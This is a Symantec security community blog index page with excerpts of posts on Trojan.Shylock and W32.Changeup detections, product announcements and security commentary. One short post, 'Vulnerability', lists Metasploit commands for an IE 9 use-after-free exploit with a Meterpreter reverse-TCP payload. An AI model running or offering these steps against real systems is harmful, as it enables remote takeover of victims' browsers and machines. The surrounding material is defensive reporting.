Video Screencast Help
Search Video Help Close Back
to help

Security Community Blog

Showing posts tagged with Symantec Protection Suites (SPS)
Showing posts in English
Featured: New Trojan.Shylock wave
Brandon Noble | 28 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot of additional functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name of the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior of for threats, as noted in this blog article from May 2012,...

Read more
Using Symantec Protection Suite Enterprise Edition (SPS EE) to protect user-owned tablets and smartphones from Internet threats
Duncan Mills | 04 Apr 2013 | 0 comments

The increased use in the workplace of user-owned devices such as smartphones and tablets, often referred to as bring your own device (BYOD), provides businesses with significant productivity and cost benefits. However, it also presents a number of complex challenges related to security.

Due to the rise of smart media devices like smartphones, tablets and ultrabooks, it is estimated that potentially, as many as 30-35%* of endpoints connected to a company’s network could be unmanaged. These are more at risk than managed endpoints which are typically subject to software patching and endpoint security policies.

Of course unmanaged endpoints are still protected by your perimeter security, such as secure web gateways. However, these have typically evolved from caching proxies and URL filters. What you need is an additional layer of security that provides the best possible levels of protection for unmanaged endpoints.

Symantec Web Gateway (SWG) will...

Read more
Symantec Security Products Data Sheets
SebastianZ | 02 Feb 2013 | 0 comments

A small compilation from the Symantec Portfolio including Data Sheets of several Symantec Security Products.

 

- Symantec™ Endpoint Protection 12.1.2 (10/12)
http://www.symantec.com/endpoint-protection/data-s...

- Symantec Endpoint Protection Small Business Edition 2013 (11/12)
http://www.symantec.com/endpoint-protection-small-...

- Symantec™ Protection Suite Enterprise Edition - Comprehensive, powerful endpoint, messaging, and Web protection, for less
money (06/11)
...

Read more
Better than Free: With 83% Faster Scanning, Symantec Endpoint Protection 12 Makes Windows 8 Great
piero_depaoli | 10 Jan 2013 | 0 comments

Microsoft gets it. Today, it makes no sense to release an operating system, especially a game-changer like Windows 8, without some form of basic antivirus protection. That’s why Windows 8 comes preloaded with a default form of protection, Windows Defender, that automatically kicks in when the system does not boot up with installed third-party protection.

 

If you get Defender for free with Windows 8, is there any point to getting any further protection? Yes -- at least 83 to begin with…

 

The numbers tell a compelling performance story

In side-by-side tests conducted by PassMark, an independent laboratory, Windows 8 with Symantec Endpoint Protection 12 consistently outperformed Windows 8 without it (with Defender as its default). Consider the highlights:

 

  • 83% faster scanning: End users spend more time working, less time managing interruptions.
...
Read more
Symantec Mail Security for Microsoft Exchange 7.0 achieves GA, Monday Dec. 3 2012
pauldchavez | 03 Dec 2012 | 0 comments

Symantec would like to announce the general availability of Symantec Mail Security for Microsoft Exchange v7.0 (SMSMSE 7.0). Microsoft Exchange continues to be the leading application used for business communication across email and organizations must protect this environment from email-born threats and the loss of sensitive data. Symantec Mail Security for Microsoft Exchange v7.0 fully supports the latest Microsoft Exchange versions to maximize protection.

Summary of New Features:

• Support for Microsoft Exchange 2013 and Microsoft®Hosted Exchange environments

• Out-of-the-box content filtering templates for protection against data loss

• Improved anti-malware and anti-spam effectiveness through advanced heuristics

• Improved manageability with full message quarantine

• Up to 30 percent performance improvement for mailbox scanning

• Microsoft® Systems Center Operation Manager 2007 R2 support for...

Read more
W32.Changeup keeps on giving
Brandon Noble | 17 May 2013 | 12 comments

I. BACKGROUND:
In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

 

II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

Read more
State of Cyber security
James Hanlon | 07 Dec 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hackitivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increased in web based attacks and an increased focus and intensity of advanced persistent...

Read more
Maintaining Systems
Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

 

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

 

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could...

Read more
Vulnerability
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Read more
Common Reference and Research Pages for Security Response
Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.
 

File-Based Protection (Traditional Antivirus)more info

Read more